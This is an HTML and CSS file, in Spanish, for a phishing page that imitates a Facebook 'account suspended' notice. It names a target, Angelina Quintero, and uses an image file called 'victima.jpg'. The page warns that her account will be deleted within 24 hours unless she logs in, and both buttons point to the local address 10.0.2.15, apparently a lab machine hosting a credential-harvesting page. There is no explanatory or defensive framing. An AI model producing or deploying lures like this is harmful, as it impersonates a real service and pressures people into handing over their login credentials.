<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <link rel="shortcut icon" href="facebook-icon.png">
    <title>cuenta suspendida</title>
</head>

<body>
    <div class="container">

        <div class="card-container">
            <div class="header">
                <a href="#">
                    <img src="victima.jpg" alt="image" height="100" width="100">
                </a>
                <h2>CUENTA SUSPENDIDA</h2>
                <h4>Angelina Quintero</h4>
            </div>
            <div class="descripcion">
                <p>Hola Angelina Quintero, Tu cuenta ha sido suspendida y ahora esta en proceso de eliminacion segun tu peticion. Si crees que esto es un error, ingresa a tu cuenta en las proximas 24 horas para reactivarla. Ten encuenta que pasado este periodo,
                    no podras recuperar ningun dato o contenido que hayas subido a tu cuenta.</p>
                <div class="social">
                    <a href="http:10.0.2.15"><button style="background-color: #4059ac;"><font color="#fff">Activar cuenta</font></button></a>
                    <a href="http:10.0.2.15"><button><font color="#000">Eliminar cuenta</font></button></a>

                </div>
            </div>
        </div>
    </div>
</body>

</html>
<style>
    * {
        margin: 0;
        padding: 0;
        box-sizing: border-box;
    }
    
    .container {
        display: flex;
        align-items: center;
        justify-content: center;
        height: 100vh;
        background: #aaaa;
        font-family: "nunito", sans-serif;
        padding: 0 20px;
    }
    
    .card-container {
        display: flex;
        width: 600px;
        height: auto;
        background: white;
        border-radius: 5px;
        box-shadow: 1px 1px 4px 2px rgba(0, 0, 0, .2);
    }
    
    .header {
        border-right: 1px solid #41313193;
    }
    
    .descripcion {
        background: #fbfbfb;
        border-radius: 5px;
    }
    
    .header,
    .descripcion {
        padding: 20px;
        text-align: center;
    }
    
    .header a {
        position: relative;
        display: block;
    }
    
    .header img {
        border-radius: 50%;
        box-shadow: 0 0 0 8px rgba(0, 0, 0, .06);
        margin: 20px 30px;
        transition: .2s;
    }
    
    .header a:hover img {
        box-shadow: 0 0 0 12px rgba(0, 0, 0, .06);
    }
    
    .header h2 {
        color: #f0522a;
    }
    
    .header h4 {
        margin-bottom: 20px;
    }
    
    .descripcion {
        position: relative;
    }
    
    .descripcion p {
        margin: 20px 30px;
        font-size: 19px;
    }
    
    .descripcion .social {
        margin-top: 25px;
    }
    
    .descripcion .social a {
        display: block;
        padding: 15px;
        border: none;
    }
    
    @media (max-width:600px) {
        .card-container {
            display: block;
        }
    }
</style>